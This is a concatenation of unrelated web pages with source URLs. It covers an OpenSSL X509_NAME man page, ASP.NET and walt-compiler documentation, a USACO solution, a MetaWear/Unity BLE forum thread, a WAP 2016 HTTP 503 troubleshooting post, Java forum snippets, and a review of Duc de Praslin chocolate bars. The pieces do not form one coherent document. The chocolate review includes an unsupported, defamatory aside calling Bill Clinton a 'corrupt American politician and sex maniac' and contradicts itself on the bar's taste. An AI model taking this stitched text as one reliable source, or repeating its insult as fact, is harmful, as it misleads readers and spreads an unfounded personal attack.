X509_NAME_get_entry() retrieves the X509_NAME_ENTRY from name corresponding to index loc. Acceptable values for loc run from 0 to (X509_NAME_entry_count(name) - 1). The value returned is an internal pointer which must not be freed.

X509_NAME_get_text_by_NID() and X509_NAME_get_text_by_OBJ() retrieve the "text" from the first entry in name which matches nid or obj; if no such entry exists, -1 is returned. At most len bytes will be written, and the text written to buf will be null terminated. The length of the output string written is returned, excluding the terminating null. If buf is NULL, then the amount of space needed in buf (excluding the final null) is returned.

For a more general solution, X509_NAME_get_index_by_NID() or X509_NAME_get_index_by_OBJ() should be used, followed by X509_NAME_get_entry() on any matching indices, and then the various X509_NAME_ENTRY utility functions on the result.

Process all entries:

    int i;
    X509_NAME_ENTRY *e;
    for (i = 0; i < X509_NAME_entry_count(nm); i++) {
        e = X509_NAME_get_entry(nm, i);
        /* Do something with e */
    }

Process all commonName entries:

    int lastpos = -1;
    X509_NAME_ENTRY *e;
    for (;;) {
        lastpos = X509_NAME_get_index_by_NID(nm, NID_commonName, lastpos);
        if (lastpos == -1)
            break;
        e = X509_NAME_get_entry(nm, lastpos);
        /* Do something with e */
    }

X509_NAME_entry_count() returns the total number of entries. X509_NAME_get_entry() returns an X509_NAME_ENTRY pointer to the requested entry or NULL if the index is invalid.
https://www.commandlinux.com/man-page/man3/X509_NAME_get_text_by_OBJ.3ssl.html
Technical blog on Microsoft ASP.NET (and AJAX and MVC).

Let's start out with an innocent control that registers a simple script file include:

    public class BaseControl : Control {
        protected override void OnPreRender(EventArgs e) {
            Page.ClientScript.RegisterClientScriptInclude(
                GetType(),
                "InitScript",
                ResolveClientUrl("~/ScriptLibrary/BaseControlInitScript.js"));
            base.OnPreRender(e);
        }
    }

All the script file does is show a little alert message when it is loaded. Stick as many of these BaseControl controls as you want on a page and the script gets included only once. This happens because ASP.NET uses the first parameter (type) and second parameter (key) in the call to RegisterClientScriptInclude to determine the uniqueness of the script.

Now a customer decides to write a custom control that derives from my control and, for whatever reason, adds no new functionality (not that it matters, but this customer is really lazy!):

    public class DerivedControl : BaseControl {
    }

What happens if you add one BaseControl and one DerivedControl to the page? How many scripts get included? Well, let's just say that I wouldn't be writing this blog if the answer was only one. Since BaseControl used GetType() as its type parameter for RegisterClientScriptInclude, the return value of GetType() is unique for each type that derives from BaseControl. As we all know, typeof(BaseControl) != typeof(DerivedControl). Since the types are unique (and thus distinct), ASP.NET concludes that these are two distinct requests to register a script, and it gets included twice in the rendered page.

The fix, fortunately, is very simple. Just replace GetType() with something constant, such as typeof(BaseControl). This way, when the code executes in the context of DerivedControl, the constant Type value remains the same, and ASP.NET removes the duplicate registration request.

At this point you might wonder why ASP.NET detects duplicates based on type and key instead of based on URL.
The answer: I have no idea why. A possible reason is that the same script URL might return different results each time. For example, maybe it's a script for advertisements and the URL returns different script for each request; if ASP.NET eliminated duplicates, it might cause a site to not work properly. Another reason is that different URLs get canonicalized to the same value. Should ASP.NET consider "foo.js" and "FOO.js" the same? On Windows they're the same, but on Unix they are not. Keep it simple. The reality is that it doesn't matter much anymore why it was done, since that's the way it is.

The important part is that you have to be careful when you're writing controls that register scripts. Go take a look at all your calls to ASP.NET's Page.ClientScript and ASP.NET AJAX's ScriptManager and see what types you're passing in.

Unfunny story: in my numerous years reviewing other people's sample ASP.NET controls, you wouldn't believe how many people decided it was a good idea to pass in typeof(int) for the type parameter and the string "key" for the key parameter. Now I wonder how many people used two different sample controls on the same page and realized that they don't work together.

What exactly is the difference between Control.ResolveUrl() and Control.ResolveClientUrl(), and any recommendations on why one should be used over the other?

Great post. Thanks.
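The (type, key) uniqueness rule is easy to model outside ASP.NET. Below is a hypothetical registry sketch in JavaScript (all names invented for illustration) that reproduces both the bug and the fix described above:

```javascript
// Hypothetical registry mimicking ASP.NET's duplicate detection:
// a script is a duplicate only if BOTH the type token and the key match;
// the URL plays no part in the comparison.
function createScriptRegistry() {
  var seen = {};
  var includes = [];
  return {
    registerInclude: function (type, key, url) {
      var id = type + "|" + key;
      if (seen[id]) return;   // same (type, key): ignored as a duplicate
      seen[id] = true;
      includes.push(url);
    },
    count: function () { return includes.length; }
  };
}

// BaseControl passing GetType(): derived types produce distinct tokens,
// so the same URL gets registered twice.
var reg = createScriptRegistry();
reg.registerInclude("BaseControl", "InitScript", "init.js");
reg.registerInclude("DerivedControl", "InitScript", "init.js");
console.log(reg.count()); // 2 -- duplicate URL not detected

// The fix: both controls pass the constant typeof(BaseControl)
var fixed = createScriptRegistry();
fixed.registerInclude("BaseControl", "InitScript", "init.js");
fixed.registerInclude("BaseControl", "InitScript", "init.js");
console.log(fixed.count()); // 1 -- second registration removed
```

The sketch makes the failure mode concrete: deduplication keyed on (type, key) silently lets identical URLs through whenever the type token varies.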
http://weblogs.asp.net/leftslipper/archive/2007/04/13/registering-scripts-in-asp-net-controls-the-right-way.aspx
- REQUIRED INFORMATION Ext version tested: Sencha Touch 2 RC; Browser versions tested against: Chrome 17.0.963.56, iOS 5 Safari (iPhone)...
- REQUIRED INFORMATION Ext version tested: Sencha Touch 2.0 RC; Browser versions tested against: Chrome 17 on XP, Android Browser...
- Sorry if this has already been posted, but when using xtype:'store' I get the following error: Cannot create an instance of unrecognized alias:...
- If I create a non-centred panel that is modal, it does not dismiss even if hideOnMaskTap is true. Sample code: Ext.Viewport.add({ xtype:...
- If your app name is the same as a namespace you're trying to set in Ext.Loader, it will be overridden when the name property updater is called. This...
- Are there any Sencha 2 examples of setting listeners for Google Maps events (in Sencha 2, Ext.Map)? This is how we do it without Sencha
http://www.sencha.com/forum/forumdisplay.php?92-Sencha-Touch-2.x-Bugs/page118&order=desc
If we pick a bale that we want to add hay to, then we can guarantee that Bessie cannot break through that bale. Therefore, once we have picked the bale, we can simulate in linear time whether Bessie can still escape by having her keep on breaking bales until she reaches one that she cannot break, and our chosen bale. If she can escape, then the bale we have selected doesn't work. However, this gives us an $O(N^2)$ algorithm which is too slow. To speed things up, let haybale $K$ be the rightmost haybale that is to the left of Bessie's starting place, and start simulating this process where haybale $K$ is the one we want to add hay to, keeping track of the rightmost bale that Bessie breaks. If we then select haybale $K-1$ as the bale to add hay to, we already know that Bessie can reach the rightmost haybale as mentioned above. If we sweep over the haybales from right-to-left, and keep track of the rightmost haybale, then we note that we do at most a linear amount of work. After sorting the haybales in $O(N \log N)$, we can do this in linear time. We do the same thing for the haybales to the right of Bessie, so the whole process is $O(N)$ after sorting. Here is Mark Gordon's code. 
    #include <iostream>
    #include <vector>
    #include <algorithm>
    #include <cstdio>
    using namespace std;

    #define INF 1000000010

    int main() {
        freopen("trapped.in", "r", stdin);
        freopen("trapped.out", "w", stdout);

        int N, B;
        cin >> N >> B;
        vector<pair<int, int> > A(N);
        for (int i = 0; i < N; i++) {
            cin >> A[i].second >> A[i].first;
        }
        sort(A.begin(), A.end());

        int result = INF;
        int sp = lower_bound(A.begin(), A.end(), make_pair(B, 0)) - A.begin();
        int j = sp;
        for (int i = sp - 1; i >= 0; i--) {
            while (j < N && A[j].first <= A[i].first + A[i].second) {
                result = min(result, A[j].first - A[i].first - A[j].second);
                j++;
            }
        }
        j = sp - 1;
        for (int i = sp; i < N; i++) {
            while (j >= 0 && A[i].first - A[i].second <= A[j].first) {
                result = min(result, A[i].first - A[j].first - A[j].second);
                j--;
            }
        }
        if (result == INF) {
            cout << -1 << endl;
        } else {
            cout << max(result, 0) << endl;
        }
        return 0;
    }
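For quick experimentation outside the grader, the same sweep can be ported to JavaScript. This is a sketch: file I/O is replaced by a function argument, and the input is given as [position, size] pairs rather than the size/position order the C++ program reads:

```javascript
// Port of the two-pointer sweep above: bales is an array of [pos, size],
// B is Bessie's starting position; returns the minimum hay to add, or -1
// if she cannot be trapped by reinforcing a single bale.
function minHayToTrap(bales, B) {
  var INF = 1000000010;
  var A = bales.map(function (p) { return { pos: p[0], size: p[1] }; })
               .sort(function (a, b) { return a.pos - b.pos; });
  var N = A.length, result = INF;
  var sp = 0;
  while (sp < N && A[sp].pos < B) sp++;    // first bale at or right of Bessie
  var j = sp;
  for (var i = sp - 1; i >= 0; i--) {      // sweep left bales right-to-left
    while (j < N && A[j].pos <= A[i].pos + A[i].size) {
      result = Math.min(result, A[j].pos - A[i].pos - A[j].size);
      j++;
    }
  }
  j = sp - 1;
  for (var k = sp; k < N; k++) {           // symmetric sweep over right bales
    while (j >= 0 && A[k].pos - A[k].size <= A[j].pos) {
      result = Math.min(result, A[k].pos - A[j].pos - A[j].size);
      j--;
    }
  }
  return result === INF ? -1 : Math.max(result, 0);
}

// Bessie at 5 between a small bale (pos 0, size 3) and a huge one (pos 10, size 20):
// she can smash the left bale (3 < gap of 10), so it needs 7 more units to hold.
console.log(minHayToTrap([[0, 3], [10, 20]], 5)); // 7
```

With two small bales on either side she breaks out regardless, and the function returns -1, matching the C++ program's behavior.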
http://usaco.org/current/data/sol_trapped_silver.html
Unity works perfectly with MetaWear sensor on first run, hangs on 2nd run

Video recording of the issue:

Unity support has come up a few times in this forum with no clear instructions on how to put it all together. I've managed to do so using the C# SDK, the Windows 10 plugin, Warble, and the .NET bindings. I'm happy to share the Unity project somewhere online for others to use, as well as keep working on it to add iOS and Android support, which I will need.

There is one problem with it, which I'm hoping someone here or at MbientLab can help me solve. Everything works perfectly the first time (connects, reads sensor data, etc.), but if you stop the engine and run it a second time, Unity hangs. The issue happens whether I clean up the MetaWearBoard or not (see OnApplicationQuit in the code below). It happens even if I don't read anything from the sensor. I've been told Unity hangs this way sometimes when threads are not disposed of correctly when the game is stopped. I'm not sure how else to work through this problem. Any hints would be tremendously appreciated! Thank you!

    public class ConnectToSensor : MonoBehaviour {
        private IMetaWearBoard metawear = null;

        async void Start() {
            try {
                Debug.Log("hello world");
                metawear = MbientLab.MetaWear.NetStandard.Application.GetMetaWearBoard("C2:BD:D8:B2:EF:35");
                Debug.Log("connecting..." + metawear.IsConnected);
                await metawear.InitializeAsync();
                Debug.Log("connected!");
                Debug.Log(metawear.IsConnected);
                Debug.Log(metawear.ModelString);
            } catch (Exception e) {
                // No exceptions are ever thrown
                Debug.Log(e);
            }
        }

        // Unity hangs on 2nd run whether this block is executed or not!
        private async void OnApplicationQuit() {
            Debug.Log("App quitting!");
            if (metawear != null && !metawear.InMetaBootMode) {
                Debug.Log("Tearing down...");
                metawear.TearDown();
                Debug.Log("Disconnecting...");
                await metawear.GetModule<IDebug>().DisconnectAsync();
                Debug.Log("Disconnected!");
            }
        }
    }

There's nothing fancy about the C# SDK.
It uses standard C# 7.0 features and classes, all of which work fine when used in a .NET Core, .NET Framework, or UWP app. Without knowing which line (or lines) of code is responsible for causing Unity to hang, I can't really provide any suggestions. Maybe more experienced Unity devs / users on the Unity forums can provide more insight. That's the thing, it's not a line of code that causes the freeze. It's re-loading the assembly for a second run. The unity logs just stop at "Reloading Assembly". No code gets executed. From my research, this type of behaviour apparently can happen if the assembly leaves a running thread or socket connection open after the first run. Is it possible that Warble or the SDK is not cleaning up all resources properly? I don't think I've seen confirmation by anyone on this forum about getting the sensor working with Unity fully, and I'm sure it's a common use-case for these Mbientlab sensors. Also it's so close to working fully! Would be happy to work through it with you if you have any ideas on where we can investigate. Thanks What I mean is, some line of code puts the Unity Editor into a state where it freezes upon the second play, unless you're saying that it always freezes regardless of whether you run any MetaWear code or not. Assuming it's the former, you'll need to start stripping away all the irrelevant code to pinpoint the exact cause. Since your example is pretty simple, the likely function is InitializeAsync. As previously stated, there's nothing fancy about the C# SDK. Everything there uses .NET Standard 2.0 libraries and C# 7.0 syntax. Regarding Warble, again, nothing fancy there. Everything there is standard functions / classes provided by the Windows 10 SDK. Hi Eric The editor freezes before any of my code executes. Not even the first line of debug is executed. It freezes when it tries to reload the metawear DLLs. That's why I can't really debug it myself. 
As I mentioned, I've read that this type of freeze (on the 2nd run) can happen if the DLL does not clean up all of its resources fully, such as, for example, a running thread. I'm not saying that you are doing anything fancy, or wrong, or outside the .NET Standard library, but there could be something in the deallocation/teardown code that could be done differently to make it work with Unity. Of course I can look through your code and try to solve it, but it will be faster with your help, as I don't know the code. ...or I can look for another sensor, I guess, but the MetaWear one is really good.

I'll see if I spot anything in your code later today. You don't need to run a debugger to isolate the line(s) of code causing the issue. All you need to do is attempt to successfully play the scene in the editor multiple times. Start with a blank app, then progressively add MetaWear calls until it freezes. I've already suggested that the InitializeAsync function is probably the line that does it. I'm not asking you to solve the problem, I'm asking you to isolate the problematic lines of code.

Hey, OK. Just to clarify: none of the MetaWear calls freeze Unity the first time around. The second time around, Unity won't even load the DLL. Now... the MetaWear call that needs to be run the first time, to cause the issue the second time, is... InitializeAsync, as you suspected. Here is a discussion about someone else who encountered the exact same freeze behaviour while writing a C++ plugin that has multithreading in it: It does seem that all of this has to do with thread management / deallocation, although I don't know what the solution is.

Based on what was posted in that Unity forum thread, the Warble C++ code is most likely the cause of the freeze then. InitializeAsync does make BLE calls, so to confirm this, remove the MetaWear functions and call Warble directly. All you really need to test is ConnectAsync and Disconnect:

Hi Eric.
I will test both Warble calls directly tomorrow and get back to you. Thanks for your help working through this.

Hi guys, I've been following this thread for a couple of days because we have the same problem with Unity. I just tried this and can confirm that when I call Warble directly, Unity freezes! Eric, can you please help on this, as we are also struggling with Unity and it's blocking our progress. Looking forward to a solution on this. Thanks!

I can confirm that calling Warble directly causes Unity to go into this weird state where either of the following actions will cause Unity to hang: Any ideas on what Warble is doing that can be done differently, Eric? Thx

PS: I'm also getting a WarbleException: Attribute cannot be written... since upgrading to firmware 1.4.1, but I'm pretty sure that's just an issue with the new firmware and will go away if I downgrade again, which I'm going to look into doing shortly.

Attached is a VS2017 solution that builds a native DLL that creates and completes an async task using the same Windows PPL classes Warble uses. If the same freezing behavior appears, then it's highly likely a compatibility issue between Unity and Windows' thread management for its async task classes. In that case, the issue is out of our hands, and Unity and Microsoft need to find a way for PPL functions to properly work in Unity.

Hrm, I'm not seeing any issues with firmware v1.4.1 on my Win10 machine. For me anyways, doing a lescan
Here is another discussion on how to get around this issue. Some stuff to check out:
- Example code on how to clean up threads
- Explanation on what Unity does when it exits
- Example code on how to fix the freeze without cleaning up your threads

I guess that is the crux of the problem. Developers aren't supposed to manage the thread pool when using an async task library and, as far as I am aware, there is no way to access the underlying Windows ThreadPool object that schedules the tasks. I did find a similar topic on the MSDN forum, but it is 7 years old and doesn't offer a solution.

Yes, exactly Eric. I tried option 3 from my previous post. I'm calling GetCurrentThread in your PPL async callback and setting the DELETE restriction on the thread so that Unity ignores the thread when it shuts down the DLL. But that does not seem to be preventing the freeze. I've also submitted a bug report with Unity (), but I don't expect any movement there for weeks/months. How much of the code in Warble relies on PPL async tasks? I'm just curious how much work it is to swap it out with manual threading, whether it's done by MbientLab, the community, or myself.

All of it. You could remove PPL tasks and directly use the returned IAsyncOperation type, but there is no guarantee that that would fix the freezing issue, and you would then have put yourself in callback hell for no reason.

Hello Eric, correct me if I'm wrong, but I can see PPL only in the win10_api.cpp file. Are there other libraries for PPL tasks in the Warble C++ project?

Yes, it does look like PPL is only used in that one file. Perhaps we can just build a proof of concept (non-PPL version) of the NativeFunctions.zip test solution you shared in this thread? We might need two calls: one that starts the thread, and one that terminates it, that we can use in Unity's OnApplicationQuit().

What I meant is that all the Windows BLE code uses PPL tasks, which is the relevant portion of this thread. Again, there is no thread control when using the Windows BLE API. All you have to work with are the provided wrapper classes that encapsulate async tasks.

Eric, just to be clear... are you (and by you I mean MbientLab in general) working towards making the MbientLab sensor work in Unity? I'm asking because it clearly says Windows Unity support on your product page, and you have two very engaged customers (myself and abcd) here willing to do whatever it takes to help. If you don't think you can get Unity to work, then make it an official stance, tell us, and remove it from your marketing, so that we can move on and be productive elsewhere. If you do think you can get there, then let's start working on some options to explore. Can we look at replacing PPL with another way of dealing with the IAsyncOperation? Maybe we can even do it all in C# directly using standard await, as explained here: ?

Eric, to continue JimJam's question and double check: when you said "All of it." and "all the Windows BLE code uses PPL tasks", do you mean that PPL exists in "Windows.Devices.Bluetooth.h", or is it ONLY in "win10_api.cpp"?

That method works in Visual Studio for .NET Framework apps that need to use WinRT classes; the Win10 plugin does the same thing if you install it in a .NET Framework project. I have no idea if it works in Unity, but if it does, then great: you can just use the .NET Framework plugin and avoid the native DLL entirely. The same Win10 plugin package also provides the same code compiled as a UWP class library, so you could also build a UWP app if you wanted. In the meantime, I can rework the code to not use tasks.

Good to hear you're going to try to help get it working in Unity, Eric. Let's try going down both paths simultaneously. One of us (either abcd or myself) can try skipping the native DLL entirely, while you rework the code to not use tasks. Will report findings as soon as possible, although I will be away for a couple of days.
Devolved code pushed to the noppl branch:

@abcd Any chance you can test the noppl branch? I'm away for a couple more days.

Thank you Eric. Hi,
1. I tested the noppl branch, and Unity still freezes, and now it also crashes after the second time. @Eric, is there something else to do? Is the PPL also inside "Windows.Devices.Bluetooth.h"?
2. I started to check the integration of the MetaWear.Win10.DotNet DLL with Unity, but it seems that Unity doesn't recognize it. I share the code. As I am not a Unity expert, @jimjam, it would be great if you can help on this when you're back.

Played around with the noppl version a bit, and it turns out the service discovery part of the connect code causes the same hangup. To fix this, I changed the connect code to only retrieve the GATT services rather than discover everything at once; GATT characteristics are instead only retrieved upon request. This did fix the hangup; however, it comes back again when you enable characteristic notifications. Documentation for event handling suggests that handlers are executed in their own thread, so we're back to square one with the Windows SDK doing its own thread management. You can check this out with commits 18894d5b (Warble) and 11c19bc8 (Warble.NET).

I also took some time to look into including System.Runtime.WindowsRuntime.dll directly in Unity; however, Unity repeatedly stated that the assembly would cause errors and unloaded it. This appears to be intentional according to this bug report: On the UWP side, there is an issue filed with loading the DataContractSerializer class, which is problematic as the C# API uses that class. A flag can be added to skip serialization, so this isn't that big of an issue, but still annoying nonetheless. This is pretty much going nowhere fast, so, as a last resort, the best option seems to be spawning a process that handles all of the MetaWear function calls and streams the sensor data back to the main app.
"This is pretty much going nowhere fast, so, as a last resort, the best option seems to be spawning a process that handles all of the MetaWear function calls and streams the sensor data back to the main app."

So just to be clear on this: as the SDK does not support Unity on Windows, are you suggesting that the only option is doing some "bypass", such as streaming data into Unity from zeromq or rabbitmq?

You're confusing the MetaWear C# SDK with the BLE plugins. The C# SDK works in Unity 2018, barring that serialization bug on UWP, which they need to fix (it can be worked around with some minor changes until then). The BLE code, external to the SDK, doesn't work in Unity for all the reasons discussed in this thread. So, until they fix that threading issue, BLE code is best handled separately from Unity, or you deal with the hassles of building a UWP app with the Unity editor.
https://mbientlab.com/community/discussion/comment/6743/
i have added the sout(ex); in catch field and when i push the button it gives me this error : java.io.IOException: could not create audio stream from input stream no ... there are no error messages ... it should play the audio in background when i push the button ! .... but unfortunatly it dsnt do nythng :( Hi friends im new at this topic and i have tried all the things to make it work but without results .. :-< can you please tell me whats not going in this simple code ?? /* * To change... i have done a thing like that .. but it doesnt works .. :( public class DragMouseAdapter implements MouseListener{ JLabel templbl,lbl1,lbl2; @Override ... how can i do that ? can you explain me with an example ? sorry but im at start ... i have tried to make a Drag and Drop for type of Puzzle. Its my school project and im the only one who is stuck with this trouble ... it doesnt exchange me the Location of the Labels .. with... ah ok ... is it possible to drag a Label containing Image from a panel1 to another Label containing in panel2 ... making a type of exchange of Labels ? or its not possible due to the Panels ?? i tried to use img.addMouseListener()..etc but the add methods for ImageIcon doesnt seem to exist :( Hi friends .. i have been trying to do a thing like exchange 2 JLabels Location using MouseListener or MouseLocation without any success :( These 2 labels Contain ImageIcons. and have the same... HI i have been working on this project for a pair of days and i dont remember if i had this problem at the start as well or not ... because the programme sometime works perfectly and sometime... hi community! :p im new at java and need so much help :D so help me whenever you can ;) thnx
http://www.javaprogrammingforums.com/search.php?s=4acbb94b779904a5425db9c0775c44da&searchid=1461229
This is the main walt compiler package.

```
npm install --save walt-compiler
```

```
type Compile = (source: string, options?: Options) => Result
```

Compile and run Walt code in the browser:

```js
import { compile } from 'walt-compiler';

const buffer = compile(`
  let counter: i32 = 0;
  export function count(): i32 {
    counter += 1;
    return counter;
  }
`).buffer();

WebAssembly.instantiate(buffer).then(result => {
  console.log(`First invocation: ${result.instance.exports.count()}`);
  console.log(`Second invocation: ${result.instance.exports.count()}`);
});
```

Compile and save a .wasm file via Node.js:

```js
const { compile } = require('walt-compiler');
const fs = require('fs');

const buffer = compile(`
  let counter: i32 = 0;
  export function count(): i32 {
    counter += 1;
    return counter;
  }
`).buffer();

fs.writeFileSync('bin.wasm', new Uint8Array(buffer));
```

```
type Result = {
  buffer: () => ArrayBuffer,
  ast: NodeType,
  semanticAST: NodeType
}
```

- buffer: a unique (across function calls) ArrayBuffer instance.
- ast: the Program root node containing the source program without any type information. This is the node passed to the semantic parser.
- semanticAST: the Program root node containing the source program including the final type information. This is the AST version used to generate the final binary.

```
type Options = {
  version?: number,
  encodeNames?: boolean,
  filename?: string,
  extensions: Array<Plugin>
}
```

- version: the target WebAssembly standard version (not to be confused with the compiler version) to which the source should be compiled. Currently supported versions: 0x01.
- encodeNames: whether or not the names section should be encoded into the binary output. This enables a certain level of extra debug output in supported browser DevTools, but increases the size of the final binary. Default: false.
- filename: filename of the compiled source code, used in error output. Default: unknown.walt.
- extensions: an array of functions which are compiler extensions. See the Plugin section for plugin details. Default: []. Note: plugins are applied from right to left, with the core language features applied last.

The compiler may be extended via extensions, or plugins. Each plugin must be a function returning an object with the keys semantics and grammar, where each value is a function:

```
type Plugin = (Options) => {
  semantics: ({ parser: Function, fragment: Function }) => {
    [string]: next => ([node: NodeType, context]) => NodeType
  },
  grammar: Function
}
```

Each plugin is capable of editing the following features of the compiler:

- grammar: the syntax, or grammar, which is considered valid by the compiler. This enables features like new keywords, for example.
- semantics: the parsing of the AST. Each key in the object returned by this method is expected to be a middleware-like parser function which may edit the node passed into it.

For an example of how plugins work, see the full list of core language feature plugins.
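To make the Plugin type concrete, here is a structural sketch of a do-nothing plugin. It is an illustration matching the type signature above, not an example from the walt-compiler docs; in particular, the node-type key name and whether grammar receives the base grammar as an argument are assumptions. Consult the core language feature plugins for the real conventions.

```javascript
// Hypothetical, do-nothing walt-compiler plugin matching the Plugin
// type above. Names and calling conventions are illustrative
// assumptions, not taken from the walt-compiler documentation.
function noopPlugin(options) {
  return {
    // Keys in the returned object are node types; each value is a
    // middleware-like parser that may edit the node. This one just
    // delegates to the next middleware unchanged.
    semantics({ parser, fragment }) {
      return {
        FunctionDeclaration: next => args => next(args),
      };
    },
    // Return the grammar unchanged (whether the base grammar is
    // passed in as an argument is an assumption).
    grammar(baseGrammar) {
      return baseGrammar;
    },
  };
}

// The plugin would then be handed to the compiler, e.g.:
// compile(source, { extensions: [noopPlugin] });
```

A real plugin would replace the pass-through middleware with one that inspects or rewrites the node before calling next.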
https://npm.runkit.com/walt-compiler
Imagine the situation. You just finished deploying AD FS 2016 and Web Application Proxy (WAP) servers in a highly available environment, with the AD FS namespace load balanced internally and externally. There are multiple AD FS servers and WAP servers. This is an interesting deployment project and all is going well. After verifying that core AD FS and WAP functionality works as expected, you then move on to using WAP to publish Exchange to the Internet using pass-through authentication. Unfortunately, no plan survives contact with the enemy....

Instead of being able to see your lovely OWA splash screen when at Starbucks, you are instead greeted with the below rather sad page. For make most glorious search engine benefit:

Service Unavailable
HTTP Error 503. The service is unavailable.

Hmm. Maybe OWA is not running on the published Exchange server – let's try ECP instead. Nope, same issue. Internally everything is just fine and all is working as expected. From the WAP servers themselves, DNS resolves to the correct endpoints, and OWA and ECP can be rendered as expected on the WAP server. The issue is only with the external publishing. Something is wrong with WAP.

Reviewing WAP Configuration

All of the required Exchange CAS namespaces were published using WAP. Below is the Remote Access Management console on server WAP-2016-1. The OWA published application is highlighted, and then a zoomed view is shown for OWA.

We can use the Remote Access Management console to open the properties of the published application, or use PowerShell. The PowerShell method is shown below:

Get-WebApplicationProxyApplication "mail.wingtiptoys.ca/owa" | Format-List

All of this looks OK. The correct certificate is selected, and the certificate is valid in all respects. Since that all seems to be fine, let's review the WAP diagnostics to see what is happening.

WAP Troubleshooting

Upon initial inspection it would seem that all is well in the WAP world.
There are no errors logged in: Applications and Services Logs\AD FS\Admin

All of these entries indicate nirvana, and they state: "The federation server proxy successfully retrieved and updated its configuration from the Federation Service 'sts.wingtiptoys.ca'."

As noted earlier, the idpinitiatedSignon page was working as expected with no issues. In this case the URL used was:

However, WAP logs to a different event log, which is: Applications and Services Logs\Microsoft-Windows-Web Application Proxy/Admin

When this log is reviewed, note that there are errors. Specifically, we can see EventID 12019, where there is an error creating the WAP listener. The details of the error are:

Web Application Proxy could not create a listener for the following URL:.
Cause: The filename, directory name, or volume label syntax is incorrect. (0x8007007b).

Well, that would be a problem, no?

Addressing WAP 2016 Application Publishing Error

The name that the error is referring to as invalid is highlighted below. It is quite common to copy the published URL and then paste it into all of the relevant fields. This is efficient and also prevents making typos. However, if the URL is pasted into the Name field as shown above, you will find yourself in a pickle and probably reading this post.....

The issue is due to the invalid "/" character in the Name field. Simply remove the offending special character to address the issue. To do this, we can right-click the WAP published application and choose Edit. Note that in the below example, the Name field was edited and now contains "OWA".

Complete the wizard to save changes. Allow WAP to save and update its configuration. This could also be done in PowerShell using the Set-WebApplicationProxyApplication cmdlet.
As an example:

Set-WebApplicationProxyApplication -BackendServerUrl "" -ExternalCertificateThumbprint 'BD4074969105149328DBA6BC8F7F0FFC9509C74F' -ExternalUrl "" -Name 'OWA' -ID '8D8344E0-52A9-ED1D-692C-81BF039813B5'

This was repeated for all published applications. Note the highlighted Name column: all of the published applications now have simplified names. Now it is time to test, and you should be back in business!

Note that this issue seems to be specific to WAP 2016, and was not present on WAP 2012 R2.

Cheers, Rhoderick

Just got done converting to WAP/ADFS 2016 and had one published app that wasn't working, and it was driving me nuts. I was chasing the firewall and LB, just looking for whatever gremlin was the culprit, and eventually a blog led me here. I can't believe it's a special character in the label...

And all is good after you edited the name, JR? Cheers, Rhoderick

Geeeeze. Been pulling my hair out for weeks on this. In my case, I didn't see anything in any of the logs – just the 503 error and no more details anywhere. This is clearly a bug. It should either not care about the name or prevent you from keying in an invalid one.

That's exactly why I posted this, Daniel, so you can work around the issue. How come you did not find this initially? Were you using a different search term that is not in this post? Cheers, Rhoderick
https://blogs.technet.microsoft.com/rmilne/2017/07/19/wap-2016-published-application-not-working-http-error-503/
I was strolling around one of Bangkok's better known shopping malls, the Emporium, and I walked by a booth selling the usual pralines and truffles. These are never cheap in Thailand because they're usually imported. I was about to make tracks when I noticed this booth sold a range of bars with well designed packaging featuring a sort of coat of arms emblazoned with "Duc de Praslin - Belgium" in various colors. That wasn't what grabbed me. Nowadays, every bar is trying to inflate its reputation by association with Switzerland or Belgium. No, the real attention grabber was the fact that each of the bars in this Origin Dark Collection was named after a different country. I couldn't be a hundred percent sure if the country names were tributes to cocoa-producing countries or if the chocolate bars, each 45 grams in size, were really manufactured from cocoa beans grown in that country. I looked at the labels closely. The bars were manufactured by a company called Gallothai, based in Bangkok. Thai-made chocolate? That was another surprise. Thailand does not enjoy a chocolate-making reputation. The chocolates you'll find stocked in the local 7-11's aren't Thai. They're mostly made in Malaysia or China. I picked up two bars on the spot just to test the waters. To compare whether the bean taste really was different from one bar to the other, I chose two bars with 64% cocoa solid content. The Costa Rica bar was the first one. I wrote Gallothai later, and the sales manager informed me that, yep, each country-named bar really is made from cocoa beans from that country. In more evolved choco markets, like the U.S., various country bean bars aren't the hardest thing to find. Gallothai has the beans roasted by a third-party cocoa processor in Belgium. The Belgian owner of Gallothai, Jean-Louis Grandorge, wrote me a few days later and said that he's been producing chocolate in Thailand since the corrupt American politician and sex maniac, Bill Clinton, assumed the White House.
Currently, about 40,000 Americans live in Costa Rica, almost 1% of the Costa Rican population, and according to one stat I read online, the highest American expat scene per capita. Americans like its weather, its lower costs, its friendliness. But do they like its cocoa beans? Gallothai describes their Costa Rica bar on the packaging as "a strong dark chocolate, with a taste enhanced by the exquisite bitter cocoa aroma. An overall delicate smoky and woody bouquet gives this chocolate its own characteristic taste." The Costa Rican bar is composed of 62% cocoa mass and only 2% cocoa butter. The taste started out smooth with just the right amount of bitterness but quickly went downhill from there. For a 64% bar, considered higher dark by many, the flavor was initially palatable, and I could see solely milk chocophiles going over to the "dark side" if they were to try only a tiny piece. Even more surprising was that a Thai company pulled this off. Costa Rica was better than many a European or Australian bar I've sampled in the Republic. The big downside: the price. 45 grams is an adequate size for a chocolate snack, but I think Gallothai keeps the bars at this size in order to keep the price reasonable. Thailand is a low cost country for food and drink, and that makes this bar look expensive. For slightly more than half the price of this bar, I could have walked 2 minutes further into the food court and ordered a vegetarian meal of rice and three dishes. The reality, as I found out from Gallothai's owner later, is that the Duc de Praslin bars are actually made in Belgium. The word 'made' must be defined strictly here. The chocolate which goes into the Origin Dark Collection bars is produced in Belgium by a company called Belcolade, but the chocolate is fashioned into 45 gram bars and packaged in Thailand by Gallothai. All chocolate, especially quality chocolate, is relatively expensive in Thailand.
When you compare the Gallothai price to those of, say, import Lindts or Movenpicks, you see that Gallothai's bars fall on the highest side without yet having the cachet value to charge those prices. Lindt and Movenpick have economies of scale Gallothai doesn't. They can rest on the European reputation for chocolate manufacturing, which Thailand doesn't have. When I thought the bars were Thai-made (though sourced from Belgian chocolate), I penalized the rating, figuring they were expensive for something produced in Southeast Asia. Realizing they were really crafted in Belgium, the chocolates fall within the acceptable price range, but on the higher side, for a Belgian import. A piece of work for Thailand, but you'll pay for the privilege.
http://www.dougsrepublic.com/chocolate/20110308-duc-costarica64.php
Some OTP-related documentation to look at:

If you need durable jobs, retries with exponential backoff, and dynamically scheduled jobs in the future - all able to survive application restarts - then an externally backed queueing library such as Exq could be a good fit. If you are starting a brand new project, I would also take a look at Faktory. It provides a language-independent queueing system, which means this logic doesn't have to be implemented across different languages, and you can use a thin client such as faktory_worker_ex.

This assumes you have an instance of Redis to use. The easiest way to install it on OSX is via brew:

> brew install redis

To start it:

> redis-server

